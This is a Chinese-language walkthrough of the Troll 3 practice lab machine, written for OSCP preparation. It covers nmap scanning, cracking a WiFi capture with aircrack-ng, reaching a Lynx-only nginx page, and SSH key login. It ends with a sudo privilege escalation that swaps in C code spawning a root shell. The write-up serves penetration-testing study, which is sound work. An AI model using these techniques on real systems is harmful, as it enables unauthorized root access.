OSCP练习:vulhub靶机TR0LL 3攻略

nmap -sC -sV 192.168.210.211
发现22端口
在这里插入图片描述

登录ssh 账密:start here (下载页面及登录页面提示)
在这里插入图片描述

发现一个网址
在这里插入图片描述

看起来没啥用
在这里插入图片描述

发现第二个账号密码,
step2:Password1! 登不上去没啥用
在这里插入图片描述

find / -type f -perm 0777 2>/dev/null find一下又执行权限的文件
发现一个cap包和一个txt
在这里插入图片描述

txt文件长得像一个字典
在这里插入图片描述

把cap包和txt下载到kali,并打开cap包查看内容

wireshark wytshadow.cap
在这里插入图片描述
发现协议都为802.11 判定为wifi流量包

使用aircrack-ng工具和获取到的字典w gold_star.txt 来爆破流量包
aircrack-ng -w gold_star.txt wytshadow.cap
在这里插入图片描述

获得密码:gaUoCe34t1
尝试使用 wytshadow:gaUoCe34t1登录
家目录下发现一个可执行文件权限为4777
在这里插入图片描述

执行后发现一直输出:iM Cr@zY L1k3 AAA LYNX
在这里插入图片描述

LYNX是一个 纯文本网页浏览器工具
sudo -l 发现本用户有启动nginx权限
在这里插入图片描述

查看nginx配置文件
在这里插入图片描述

发现nginx端口为8080,且只有ua为Lynx能够访问
在这里插入图片描述

sudo /usr/sbin/service nginx start 启动nginx
在这里插入图片描述

lynx http://192.168.210.211:8080
得到账密genphlux:HF9nd0cR!
在这里插入图片描述

成功登录
在这里插入图片描述

发现两个文件maleus xlogin
在这里插入图片描述

发现maleus为私钥,尝试ssh私钥登录
在这里插入图片描述

下载私钥到kali,更改私钥权限为600
登录成功
!在这里插入图片描述

查看.viminfo文件,发现密码B^slc8I$
在这里插入图片描述

查看sudo权限,发现dont_even_bother文件可执行且sudo执行有root用户权限
在这里插入图片描述

但原程序执行结果没什么用
在这里插入图片描述

将代码写入新文件dont_even_bother.c
int main (void){
setresuid(0,0,0);
system(“/bin/sh”);
}
编译程序gcc dont_even_bother.c -o dont_even_bother
在这里插入图片描述

执行程序,提权成功,拿到flag
在这里插入图片描述

**在这里插入图片描述**

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值